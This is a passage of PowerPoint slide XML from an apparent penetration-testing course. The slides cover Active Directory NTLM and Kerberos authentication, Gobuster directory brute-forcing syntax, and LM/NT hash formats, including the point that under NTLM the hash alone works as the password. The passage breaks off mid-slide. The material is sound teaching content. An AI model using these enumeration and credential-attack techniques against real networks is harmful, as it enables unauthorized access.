            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E6A5A6-31A3-4801-85D3-9F1D6A8ECE63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F512DFD-EC3A-406C-B592-D246FF00A513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="299646" y="1242707"/>
            <a:ext cx="5611008" cy="4372585"/>
            <a:chOff x="3290496" y="1471307"/>
            <a:chExt cx="5611008" cy="4372585"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88A449DE-E165-4B5C-93D9-FC0588A33AEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3290496" y="1471307"/>
              <a:ext cx="5611008" cy="4372585"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{906E6AE4-520A-4593-B35F-2DB9A8F23538}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4829175" y="4547235"/>
              <a:ext cx="112395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4DC0FDDB-1FA7-4332-B312-8DED4E80F929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="16188"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183460" y="1880883"/>
            <a:ext cx="6594960" cy="3353268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1DFA625-1DDC-4FE4-AF3B-044175313A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810375" y="4299585"/>
            <a:ext cx="1035714" cy="3295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6803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31F35-38EB-499B-A4DC-90F0243050CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>268</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00572A19-9542-43A6-A858-4ACF07943E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication in AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420484308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7A42A-2C94-4266-B6AC-5832EB10BC87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>269</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23009BE4-D91B-4CAD-A074-4A73FEC240EE}"/>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C70529AE-3122-4573-A5B9-A911284F2F2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two main types: NTLM and Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NT LAN Manager - NTLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An advance over the prior LAN Manager (LM) authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for authentication by IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default authentication when using FQDNs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More secure, but not without its faults</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2608971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79862-E623-4BAC-BDE0-22D1AFF2AE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2E399BC-A97A-45EA-9687-07578B7EFF54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gobuster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A974EB13-722F-4A52-8A1F-C74485D7AE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102118" y="1391920"/>
            <a:ext cx="9833914" cy="3911600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD7C4BC-E15A-41AC-9B84-D43134A0580E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2106849" y="5432594"/>
            <a:ext cx="7468642" cy="828791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE68BF6-CF1E-4CA5-84CD-97C3EE4E4BA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3731377" y="5813761"/>
            <a:ext cx="312303" cy="2369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CF7BAE51-8136-4EE7-B90D-304334363584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1544320" y="6213712"/>
            <a:ext cx="8676640" cy="369332"/>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 – Depending on your </a:t>
            </a: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Gobuster</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version, </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-l </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may cause an error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F285B4A-248E-4AE5-A1C4-2AF84B24B0EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1967265" y="790647"/>
            <a:ext cx="10021632" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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Basic Syntax: </a:t>
            </a:r>
            <a:b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b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gobuster</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dir</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-u &lt;</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url</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&gt; -w &lt;wordlist&gt; -t &lt;threads&gt; -x &lt;</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exts</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&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="250287000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DD979A-8AB8-4C8D-A499-2EEBDBF1315F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>270</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9816539-60C0-4196-B82A-F7464EF0F1D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Quick Word on Hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A750614-7888-473B-B789-C3929D7B9C68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM = Authentication Protocol, not the hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the actual hash of the password – uses md4 and UTF-16 Little Endian encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LM hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>paired with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NTHash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, e.g.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aad3b435b51404eeaad3b435b51404ee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e489af40b77e5848401d58658c421d1d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The LM value above is 7 null characters, repeated twice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That’s part of the problem with LM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each part hashed separately </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> only need to crack 7 characters at a time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Many tools will either use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>aad3…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> value for an empty LM, or simply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>NTHash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89226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F80F08-93B9-435E-BF15-A9EF42B524DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>271</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4774E3E1-8169-46FE-84DA-1889D0CCF954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1181BADA-50F4-4BED-81C7-33E15666EBD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371599"/>
            <a:ext cx="11338560" cy="1007617"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenge and Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BIG ISSUE: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> becomes the password – don’t need the actual password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{762CEFE4-A207-49E1-B58D-9ACC0F3CD040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="762504" y="2586759"/>
            <a:ext cx="10666993" cy="3803048"/>
            <a:chOff x="1370648" y="2586759"/>
            <a:chExt cx="10666993" cy="3803048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Graphic 6" descr="Database with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7147343-E0E5-4AF8-B208-5003BF63B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4685" y="2586759"/>
              <a:ext cx="1684482" cy="1684482"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Graphic 8" descr="Server with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B54470F2-9100-4634-8483-7B6324CD7D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3869" y="4812489"/>
              <a:ext cx="1577318" cy="1577318"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Graphic 10" descr="Monitor with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E75D8346-F343-4189-8CD4-ACA6A4CF2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0648" y="2586759"/>
              <a:ext cx="1684482" cy="1684482"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Arrow: Right 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC551CE-7E0E-4059-B55C-C7590598960E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3295649" y="2953578"/>
              <a:ext cx="6086475" cy="29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EB8694E-6430-4E38-81DD-C2B78619DCF4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="3295649" y="3429000"/>
              <a:ext cx="6086475" cy="29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352606E-0B13-4364-8FF3-81D10AE3DBAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3295649" y="3904425"/>
              <a:ext cx="6086475" cy="29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E87171-1375-4926-81AA-7FC75F20B789}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5242957" y="2651749"/>
              <a:ext cx="2544286" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Client sends username</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2027A3C3-4CD9-4F93-81FC-DFECC62D73A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4992888" y="3160176"/>
              <a:ext cx="3044423" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Server responds with nonce</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
